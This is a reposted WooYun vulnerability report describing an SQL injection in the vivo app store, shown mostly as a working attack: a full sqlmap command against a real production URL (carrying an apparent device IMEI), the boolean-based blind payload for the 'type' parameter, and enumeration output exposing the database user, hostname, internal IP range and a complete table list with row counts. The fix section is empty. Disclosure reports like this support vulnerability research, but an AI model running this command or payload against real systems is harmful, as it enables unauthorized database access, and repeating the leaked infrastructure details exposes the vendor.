神刀安全网

漏洞标题: vivo应用商店一处SQL注入

漏洞详情

披露状态:

2016-04-01: 细节已通知厂商并且等待厂商处理中
2016-04-06: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

rt

详细说明:

code 区域
python sqlmap.py -u "http://main.appstore.vivo.com.cn/rec/newapps?nt=WIFI&u=-57806365&;model=vivo+Y13iL&density=1.5&pictype=webp&elapsedtime=13993004&screensize=480_854&an=4.4.4&imei=868102024538774&app_version=622&type=2&av=19&cs=0&s=2%7C3511262971"

code 区域
Parameter: type (GET)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
Payload: nt=WIFI&u=-57806365&model=vivo Y13iL&density=1.5&pictype=webp&elapsedtime=13993004&screensize=480_854&an=4.4.4&imei=868102024538774&app_version=622&type=(SELECT (CASE WHEN (9154=9154) THEN 9154 ELSE 9154*(SELECT 9154 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&av=19&cs=0&s=2|3511262971
---
back-end DBMS: MySQL 5.0
banner: '5.5.39-log'
current user: '[email protected]%'
current database: 'appstore'
hostname: 'bj_appdb02'
current user is DBA: False
database management system users [1]:
[*] 'myappstore_r'@'10.13.13.%'

database management system users privileges:
[*] %myappstore_r% [1]:
privilege: USAGE

database management system users roles:
[*] %myappstore_r% [1]:
role: USAGE

available databases [3]:
[*] appstore
[*] information_schema
[*] test

漏洞证明:

code 区域
Database: appstore
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| t_app_comment | 8381086 |
| t_app_baidu | 5399705 |
| t_app_screenshot_history | 5244691 |
| t_app_download_log_20141104 | 5163862 |
| t_app_download_complete_log_20141107 | 4758294 |
| t_browse_app_log_20141107 | 3713899 |
| t_app_download_complete_log_20141104 | 3474746 |
| t_browse_app_log_20141104 | 2880982 |
| t_app_comment_20150321_bak | 1300759 |
| t_app_pc_download_log | 1148008 |
| t_push_log_20141107 | 1072361 |
| t_checkmd5fail_log | 644221 |
| t_testin_passed_overview | 549221 |
| t_search_word_log_20141107 | 452975 |
| t_app_screenshot | 348472 |
| t_search_word_log_20141104 | 337439 |
| t_testin_safe_report | 329668 |
| t_ac_app_screenshot | 324204 |
| t_search_word_log_20150202 | 320806 |
| t_app_relate_recommend | 303661 |
| t_rank_setup | 260106 |
| t_app_filter | 130289 |
| t_testin_overview | 103093 |
| t_testin_safe_report_back | 87557 |
| t_comment_forbid_reason | 84861 |
| t_testin_back | 82375 |
| t_app_info | 77037 |
| t_ac_app_info | 76660 |
| t_app_tags | 70172 |
| t_app_download_count_201603 | 65873 |
| t_app_download_stat | 65873 |
| t_app_download_month_rank | 65872 |
| t_app_download_count_201601 | 64731 |
| t_app_download_count_201602 | 64343 |
| t_app_download_count_201511 | 63951 |
| t_app_download_count_201512 | 63753 |
| t_app_download_count_201510 | 57766 |
| t_app_download_count_201509 | 56187 |
| t_app_download_count_201508 | 55218 |
| t_app_download_count_201507 | 53310 |
| t_app_download_count_201506 | 50191 |
| t_app_download_count_201505 | 49740 |
| t_app_download_count_201504 | 49207 |
| t_testin | 48941 |
| t_app_download_count_201503 | 47113 |
| t_user_operation | 43929 |
| t_award_info | 35707 |
| t_app_download_count_201502 | 34512 |
| t_apk_delete | 33559 |
| t_app_download_count_201501 | 33179 |
| t_rank_risk | 33111 |
| t_comment_grade | 32560 |
| t_testin_failed_overview | 31168 |
| t_app_download_count_201412 | 28467 |
| t_ac_wdj_icon | 27544 |
| t_app_download_count_201411 | 24203 |
| t_testin_overview_back | 23695 |
| t_type_app | 22178 |
| t_type_game | 21813 |
| t_type_rank_setup | 19412 |
| t_comment_grade_20150321_bak | 17779 |
| t_push_log_20150202 | 15249 |
| t_console_adminlog | 10145 |
| t_focus_rank_setup | 9804 |
| t_type_recommend_rank_bspread | 9787 |
| t_hub_set | 7050 |
| t_android_permission | 6847 |
| t_baidu_app_comment | 6586 |
| t_rank_idx_rec_ab | 6400 |
| t_app_type_info | 5443 |
| t_testin_noexecute_overview | 5200 |
| t_ad_app | 4845 |
| t_ad_icon | 4650 |
| t_app_baidu_type | 4532 |
| t_ip_area_config | 4449 |
| t_search_word_rank | 3900 |
| t_relation_tags | 2695 |
| t_baidu_app_screenshot | 2158 |
| t_comment_forbid | 2073 |
| t_excel_rank_app | 1999 |
| t_excel_rank_popup_word | 1940 |
| t_app_info_delete | 1828 |
| t_baidu_app_info_delete | 1397 |
| t_business_game | 1346 |
| t_ad_info | 1311 |
| t_model_topic | 1082 |
| t_rank_popular_daily | 1000 |
| t_popupword_rank_setup | 984 |
| t_template_app | 862 |
| t_app_screenshot_img | 789 |
| t_hot_word | 780 |
| t_top_sync | 750 |
| t_tags | 745 |
| t_topic_icon | 732 |
| t_censor_word | 720 |
| t_baidu_app_info | 709 |
| t_app_package_double | 628 |
| t_excel_rank_hot_word | 596 |
| t_browse_app_log_20150202 | 531 |
| t_topic_module_app | 474 |
| t_activity_info | 433 |
| t_push_log_20151205 | 425 |
| t_excel_rank_type_app | 401 |
| t_type_recommend_rank | 400 |
| t_charge_sign | 376 |
| t_excellent_app_log | 352 |
| t_cellphone_recommend_bak | 320 |
| t_ac_app_info_all | 319 |
| t_packages_update_log_20141107 | 316 |
| t_tmp_package | 312 |
| t_topic_info | 282 |
| t_packages_update_log_20141104 | 272 |
| t_charge_sign_bak | 248 |
| t_search_word_relation | 227 |
| t_app_download_month_top | 220 |
| t_app_onsale_date_top | 220 |
| t_rank_application | 220 |
| t_rank_console_game | 220 |
| t_rank_game | 220 |
| t_rank_hot | 220 |
| t_rank_new | 220 |
| t_rank_online_game | 220 |
| t_rank_popular | 220 |
| t_top_application | 220 |
| t_top_console_game | 220 |
| t_top_game | 220 |
| t_top_online_game | 220 |
| t_top_risk | 220 |
| t_rank_risk_order | 217 |
| t_activity_app | 201 |
| t_rank_hot_bak | 200 |
| t_rank_new_bak | 200 |
| t_model_activity | 196 |
| t_console_adminmenu | 175 |
| t_hotword_autosched | 175 |
| t_search_word_top | 174 |
| t_system_package_tmp | 166 |
| t_model_info_sub | 161 |
| t_ac_app_info_hot | 159 |
| t_app_install_log | 155 |
| t_index_model_apps | 130 |
| t_top_girls_app | 128 |
| t_top_boys_app | 126 |
| t_model_info | 121 |
| t_rank_place | 120 |
| t_recommend_common_setup | 119 |
| t_app_history_info | 117 |
| t_testin_risked_overview | 116 |
| t_app_type_second | 108 |
| t_ac_spider_list_task | 107 |
| t_ac_spider_list_template | 107 |
| t_push_log_20151209 | 105 |
| t_app_recommend | 100 |
| t_game_recommend | 100 |
| t_search_hot_word | 100 |
| t_search_hot_word_bak | 99 |
| t_cellphone_recommend | 98 |
| t_console_adminmenu_bak | 93 |
| t_type_rank | 93 |
| t_console_constant | 73 |
| t_start_page | 68 |
| t_focus_setting | 64 |
| t_app_hui | 61 |
| t_topic_module_item | 46 |
| t_console_h5resource | 44 |
| t_system_package | 42 |
| t_developer_app_type | 37 |
| t_topic_module | 32 |
| t_focus_picture | 29 |
| t_app_type_bak | 27 |
| t_type_icon_bak | 27 |
| t_app_type | 26 |
| t_editor_recommend | 26 |
| t_type_icon | 26 |
| t_admin_user_security | 24 |
| t_search_app | 24 |
| t_tmp_package2 | 24 |
| `t_console_adminuser-20141229-bak` | 22 |
| t_baidu_type | 21 |
| t_type_personal | 21 |
| t_type_mapping | 20 |
| t_template_apptype | 19 |
| t_app_list | 18 |
| t_push_log_20141104 | 16 |
| t_index_model_subtitle | 15 |
| t_db_version | 14 |
| t_hub_content | 14 |
| t_rank_hot_unsupport | 14 |
| t_update_system_package | 14 |
| t_hub_info | 12 |
| t_model_ad | 10 |
| t_operation_constant | 10 |
| t_word_popup | 10 |
| t_push_log_20151206 | 6 |
| t_series_info | 6 |
| t_app_replace | 5 |
| t_entry_info | 5 |
| t_template_resource | 5 |
| t_activity_tag | 4 |
| t_push_activity | 4 |
| t_top_wrapper | 4 |
| t_top_wrapper_cache | 4 |
| t_ac_spider_detail_template | 3 |
| t_activity_set_img | 3 |
| t_app_replace_history | 3 |
| t_ac_single_download | 2 |
| t_focus_grid | 2 |
| t_moble_error | 2 |
| t_moble_error_baidu | 2 |
| t_search_black_list | 2 |
| t_top_relation | 2 |
| t_activity_set | 1 |
| t_app_baidu_install_log | 1 |
| t_app_type_new | 1 |
| t_hotapp_info | 1 |
| t_index_model | 1 |
| t_recommend_common | 1 |
| t_review_records | 1 |
+--------------------------------------+---------+

修复方案:

版权声明:转载请注明来源 sauce@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: vivo应用商店一处SQL注入

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
分享按钮